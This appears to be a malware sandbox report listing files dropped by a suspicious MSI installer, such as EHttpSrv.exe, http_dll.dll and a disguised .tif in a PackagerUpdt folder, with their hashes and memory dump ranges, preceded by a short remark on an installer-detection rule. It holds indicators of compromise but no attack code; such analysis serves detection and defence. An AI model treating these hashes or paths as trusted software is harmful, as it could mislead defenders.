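The bing.com flows are kept in the sample on purpose: they come from the Windows shell with its own user agent and should not trip the installer check, which is why the match keys on both the user agent and the `.msi` path rather than on GitHub alone.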

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Config.Msi\e57b325.rbs

    Filesize

    2KB

    MD5

    d2a4749ed59fbd8df57f25080dad16c4

    SHA1

    3629dc902832dc2b5eae9f410e28df6f89e07248

    SHA256

    d1eaf452b9c206137719c7834cadec3d4213af648d68f2194601608899a919ce

    SHA512

    018698c197e266c4b604fe28278067f4fcb2303b9644c7fd92c694d695888da871c3038e96c92a546d5acb3eb18bca214373cb79748f85ae49576c3ede56fe3e

  • C:\Program Files (x86)\Common Files\PackagerUpdt\EHttpSrv.exe

    Filesize

    20KB

    MD5

    9329ba45c8b97485926a171e34c2abb8

    SHA1

    20118bc0432b4e8b3660a4b038b20ca28f721e5c

    SHA256

    effa6fcb8759375b4089ccf61202a5c63243f4102872e64e3eb0a1bdc2727659

    SHA512

    0af06b5495142ba0632a46be0778a7bd3d507e9848b3159436aa504536919abbcacd8b740ef4b591296e86604b49e0642fee2c273a45e44b41a80f91a1d52acc

  • C:\Program Files (x86)\Common Files\PackagerUpdt\MFC80U.DLL

    Filesize

    1.0MB

    MD5

    686b224b4987c22b153fbb545fee9657

    SHA1

    684ee9f018fbb0bbf6ffa590f3782ba49d5d096c

    SHA256

    a2ac851f35066c2f13a7452b7a9a3fee05bfb42907ae77a6b85b212a2227fc36

    SHA512

    44d65db91ceea351d2b6217eaa27358dbc2ed27c9a83d226b59aecb336a9252b60aec5ce5e646706a2af5631d5ee0f721231ec751e97e47bbbc32d5f40908875

  • C:\Program Files (x86)\Common Files\PackagerUpdt\audiogram.tif

    Filesize

    877KB

    MD5

    5124236fd955464317fbb1f344a1d2f2

    SHA1

    fe3a91e252f1dc3c3b4980ade7157369ea6f5097

    SHA256

    ed1389002cdf96c9b54de35b6e972166ee3296d628943fd594a383e674c5cba6

    SHA512

    2b2ac23244b16f936ef9a4049586f58c809fcc4391a56390cc5db2e8d96140001e0b977680ed1d8b0ab9c410e865a880209e22add8d42e563dc40bc91236b252

  • C:\Program Files (x86)\Common Files\PackagerUpdt\http_dll.dll

    Filesize

    2.3MB

    MD5

    1e2a640f1a98da16fc61c865cec7d54e

    SHA1

    178563fab7b06e99551f66ba090d0911205a2fe4

    SHA256

    e296a18272a7bde471f37e51d49e6febe944ed4e78a2d5e79f1b2ee3330fb10f

    SHA512

    2426b1ce2bd01af6f34c56e1ef0290e521566ae1196a15aeb594bcf33793aa405ce01b4196bfe48de33320bab7a570a55110995025c54edcf790c2d10166fa9c

  • C:\Users\Admin\AppData\Local\Temp\4407b7c1

    Filesize

    1.0MB

    MD5

    0e530ad32eae61b8f5dc032ece4d89a5

    SHA1

    f4afc1228c44112bc707461070f384370dd123be

    SHA256

    143db7d24da0f3d7c9ce440a50f49f78b3a65ee54066cb24cfb13bf6198bc622

    SHA512

    6674eeb2576b135dc19aaa454e8cfed43bf57d3dfb96a27c83d9f7ec5b12cefb114391956ff9fefd19843ad7cefc0d5764dcea294b29f871a41d3aa0fef9a7a0

  • C:\Windows\Installer\MSIAD57.tmp

    Filesize

    4.3MB

    MD5

    8e31046891c36ca794fb01262cd890d9

    SHA1

    7f812da89f328e871290be32bdead1fc869377d6

    SHA256

    d03d7ea5956a5d9ca6c1b1af800350b6ef400815b452f69a886f4156ba1a3ec5

    SHA512

    95c4c8f0196a8e373913fc41eb44c70fa8abbea38324993aa42ca05be5d6229430a4e2a4671a914a4f00986b75845c247a91809aae994ff835aa56614606840d

  • C:\Windows\Installer\MSIB0F2.tmp

    Filesize

    557KB

    MD5

    2c9c51ac508570303c6d46c0571ea3a1

    SHA1

    e3e0fe08fa11a43c8bca533f212bdf0704c726d5

    SHA256

    ff86c76a8d5846b3a1ad58ff2fd8e5a06a84eb5899cdee98e59c548d33335550

    SHA512

    df5f1def5aac44f39a2dfde9c6c73f15f83a7374b4ad42b67e425ccb7ac99a64c5701b676ae46d2f7167a04a955158031a839e7878d100aaf8fab0ce2059f127

  • memory/432-67-0x0000000000410000-0x0000000000494000-memory.dmp

    Filesize

    528KB

  • memory/432-71-0x0000000000410000-0x0000000000494000-memory.dmp

    Filesize

    528KB

  • memory/432-78-0x0000000000410000-0x0000000000494000-memory.dmp

    Filesize

    528KB

  • memory/432-77-0x0000000000410000-0x0000000000494000-memory.dmp

    Filesize

    528KB

  • memory/432-61-0x0000000072A60000-0x0000000073CB4000-memory.dmp

    Filesize

    18.3MB

  • memory/432-63-0x00007FFD7A9F0000-0x00007FFD7ABE5000-memory.dmp

    Filesize

    2.0MB

  • memory/432-64-0x0000000000410000-0x0000000000494000-memory.dmp

    Filesize

    528KB

  • memory/432-76-0x0000000000410000-0x0000000000494000-memory.dmp

    Filesize

    528KB

  • memory/432-68-0x0000000000410000-0x0000000000494000-memory.dmp

    Filesize

    528KB

  • memory/432-70-0x0000000000410000-0x0000000000494000-memory.dmp

    Filesize

    528KB

  • memory/432-75-0x0000000000410000-0x0000000000494000-memory.dmp

    Filesize

    528KB

  • memory/4136-51-0x0000000073EA0000-0x000000007401B000-memory.dmp

    Filesize

    1.5MB

  • memory/4136-50-0x0000000073EA0000-0x000000007401B000-memory.dmp

    Filesize

    1.5MB

  • memory/5116-59-0x0000000073EA0000-0x000000007401B000-memory.dmp

    Filesize

    1.5MB

  • memory/5116-57-0x00007FFD7A9F0000-0x00007FFD7ABE5000-memory.dmp

    Filesize

    2.0MB
